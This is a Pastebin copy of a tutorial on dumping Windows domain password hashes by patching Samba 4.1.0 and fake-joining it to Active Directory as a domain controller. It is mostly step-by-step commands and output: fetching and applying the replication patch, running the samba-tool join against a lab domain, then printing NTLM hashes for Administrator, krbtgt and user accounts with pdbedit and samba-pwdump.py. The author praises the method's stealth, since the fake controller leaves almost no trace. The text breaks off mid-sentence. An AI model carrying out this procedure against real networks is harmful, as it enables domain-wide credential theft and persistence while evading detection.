opexxx

Dumping NTDS.dit Domain Hashes Using Samba

May 19th, 2014
505
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 5.74 KB | None | 0 0
  1.  
  2. Dumping NTDS.dit Domain Hashes Using Samba
  3.  
  4. May 14th, 2014 | Comments
  5.  
  6. So there was this blog post that talking about a number of ways to dump windows credentials by @lanjelot [definitly someone to follow] – here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)
  7.  
  8. What it boils down to is if you can position a system that can do DNS resolution to the target domain, and perform some other UDP traffic, you can fake join a samba server you control to a domain and it doesn’t require code execution in any way on the domain controller.
  9.  
  10. Notice: I am not doing this on a Kali Linux box, there is already an install of Samba there and I didn’t want to try uninstalling or modifying the one installed.
  11.  
  12. First, you need this patch:
  13.  
  14. wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt
  15.  
  16. and Samba 4.1.0
  17.  
  18. wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz
  19.  
  20. You will probably also require some dependencies to be installed:
  21.  
  22. apt-get install python2.7-dev python-samba libacl1-dev build-essential libldap2-dev libkrb5-dev attr
  23.  
  24. Since the patch is kinda wonky, you need to make a src directory and extract samba into there first. Then apply the patch in whatever directory is above src
  25.  
  26. 1
  27. 2
  28. 3
  29. 4
  30. 5
  31.  
  32.    
  33.  
  34. mkdir src
  35. mv samba-4.1.0.tar.gz src/
  36. cd src/
  37. tar zxvf samba-4.1.0.tar.gz
  38. cd /root/
  39.  
  40. So it would look like this:
  41.  
  42. 1
  43. 2
  44. 3
  45.  
  46.    
  47.  
  48. samba-4.1.0_replication-only-patch.txt
  49. src/
  50. src/samba-4.1.0/
  51.  
  52. then run patch -p0 < samba-4.1.0_replication-only-patch.txt
  53.  
  54. 1
  55. 2
  56. 3
  57. 4
  58.  
  59.    
  60.  
  61. cd ./src/samba-4.1.0/
  62. ./configure
  63. make
  64. make install
  65.  
  66. Prepare the box:
  67.  
  68. 1
  69.  
  70.    
  71.  
  72. rm -rf /var/lib/samba; mkdir /var/lib/samba; rm -f /etc/samba/smb.conf
  73.  
  74. Next you need to make sure you are resolving correctly (if you can’t resolve the SRV record _ldap._tcp.sittingduck.info (sittingduck.info being the domain) then this isn’t going to work.
  75.  
  76. 1
  77.  
  78.    
  79.  
  80. echo nameserver 192.168.92.37 > /etc/resolv.conf # this is the IP address of the DC
  81.  
  82. Then start the clone:
  83.  
  84. 1
  85.  
  86.    
  87.  
  88. /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
  89.  
  90. Looks like this:
  91.  
  92. 1
  93. 2
  94. 3
  95. 4
  96. 5
  97. 6
  98. 7
  99. 8
  100. 9
  101. 10
  102. 11
  103. 12
  104. 13
  105. 14
  106. 15
  107. 16
  108. 17
  109. 18
  110. 19
  111. 20
  112. 21
  113. 22
  114. 23
  115. 24
  116. 25
  117. 26
  118. 27
  119. 28
  120. 29
  121.  
  122.    
  123.  
  124. root@sambabox:~/src/samba-4.1.0# /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
  125. Finding a writeable DC for domain 'sittingduck.info'
  126. Found DC 2K8DC.sittingduck.info
  127. Password for [SITTINGDUCK\administrator]:
  128. workgroup is SITTINGDUCK
  129. realm is sittingduck.info
  130. Calling bare provision
  131. No IPv6 address will be assigned
  132. Provision OK for domain DN DC=sittingduck,DC=info
  133. Starting replication
  134. Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
  135. Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
  136. Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
  137. Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1521] linked_values[0]
  138. Analyze and apply schema objects
  139. Partition[CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
  140. Partition[CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
  141. Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
  142. Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1608] linked_values[1]
  143. Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1614] linked_values[11]
  144. Replicating critical objects from the base DN of the domain
  145. Partition[DC=sittingduck,DC=info] objects[100] linked_values[24]
  146. Partition[DC=sittingduck,DC=info] objects[353] linked_values[27]
  147. Done with always replicated NC (base, config, schema)
  148. Committing SAM database
  149. descriptor_sd_propagation_recursive: DC=DomainDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
  150. descriptor_sd_propagation_recursive: DC=ForestDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
  151. Joined domain SITTINGDUCK (SID S-1-5-21-3147519476-3247671789-820278723) as a DC
  152.  
  153. Then to get the hashes:
  154.  
  155. 1
  156. 2
  157. 3
  158. 4
  159. 5
  160. 6
  161. 7
  162. 8
  163.  
  164.    
  165.  
  166. root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w
  167. 2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:
  168. Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:
  169. krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:
  170. nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U          ]:LCT-00000000:
  171. jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:
  172. uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:
  173.  
  174. Or you can do it with history:
  175.  
  176. 1
  177. 2
  178. 3
  179. 4
  180. 5
  181. 6
  182. 7
  183. 8
  184. 9
  185.  
  186.    
  187.  
  188. root@sambabox:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
  189. SAMBACLONE$:1104:::::
  190. 2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
  191. Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
  192. krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
  193. Guest:501:::::
  194. jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
  195. uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
  196. uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::
  197.  
  198. Game over. The great thing is that it never actually shows up as a joined box in the domain, and as far as I can tell the only log on the real DC is the login success of a domain admin. Plus one of the huge benefits to this method is that once you have the database Samba makes it really easy to
Add Comment
Please, Sign In to add comment